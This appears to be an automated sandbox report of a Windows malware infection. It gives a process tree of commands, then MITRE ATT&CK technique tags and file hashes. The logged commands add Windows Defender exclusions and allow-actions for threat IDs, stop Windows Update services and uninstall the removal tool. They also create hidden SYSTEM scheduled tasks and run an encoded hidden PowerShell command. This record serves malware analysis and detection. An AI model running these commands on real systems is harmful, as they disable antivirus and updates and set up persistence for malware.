/t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"2⤵PID:6008
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:323⤵PID:5444
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:324⤵PID:1844
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:643⤵PID:396
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:323⤵PID:2324
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:643⤵PID:1212
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:323⤵PID:5936
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:643⤵PID:5596
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:323⤵PID:6088
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:643⤵PID:5472
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:323⤵PID:1032
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:643⤵PID:216
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:323⤵PID:3292
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:643⤵PID:5792
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:2572
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:5404
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:5184
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4052
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:323⤵PID:2908
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:643⤵PID:5960
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:323⤵PID:3628
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:643⤵PID:5956
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gmXtmAUxE" /SC once /ST 01:05:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:336 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gmXtmAUxE"2⤵PID:5100
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5612
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gmXtmAUxE"2⤵PID:5420
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 06:52:33 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\IyUvZSr.exe\" GH /PmUBdidnO 385118 /S" /V1 /F2⤵
- Creates scheduled task(s)
PID:4336 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "XyyyteIMwZeutaZuw"2⤵PID:3872
-
C:\Users\Admin\AppData\Local\Temp\7zS3D33.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS3D33.tmp\Install.exe it /EvLdidZJHr 385118 /S1⤵PID:3220
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:6000
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:6060
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:5484
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:5984
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:1844
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:5624
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:3500
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:1640
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:5600
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:364
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:5836
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:5184
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:1664
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:1032
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:2444
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
PID:5100 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:5548
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵PID:4396
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:4672
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4104
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1768
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4832
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:5784
-
C:\ProgramData\Google\Chrome\updater.exeC:\ProgramData\Google\Chrome\updater.exe1⤵PID:4516
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
PID:3268 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:1948
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:3736
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:3908 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:620 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:5652 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:5540 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:4932 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵PID:5556
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵PID:1788
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵PID:336
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵PID:5500
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:4880
-
C:\Windows\explorer.exeexplorer.exe2⤵PID:5800
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe1⤵PID:5460
-
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exeC:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe1⤵PID:1936
-
C:\ProgramData\taskmgr.exeC:\ProgramData\taskmgr.exe1⤵PID:5844
-
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe1⤵PID:220
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
PID:5332
-
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\IyUvZSr.exeC:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\IyUvZSr.exe GH /PmUBdidnO 385118 /S1⤵PID:5688
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:208
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:880
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:1056
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:5516
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:5324
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:1220
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"2⤵PID:5532
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:1132
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:5764
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:5548
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
PID:216 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\eAmLKi.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F2⤵
- Creates scheduled task(s)
PID:4532
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe1⤵PID:1916
-
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exeC:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe1⤵PID:2380
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Modify Registry
2Pre-OS Boot
1Bootkit
1Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\GameSyncLink\GameService.exeFilesize
288KB
MD5d9ec6f3a3b2ac7cd5eef07bd86e3efbc
SHA1e1908caab6f938404af85a7df0f80f877a4d9ee6
SHA256472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c
SHA5121b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4
-
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exeFilesize
2.5MB
MD5e6943a08bb91fc3086394c7314be367d
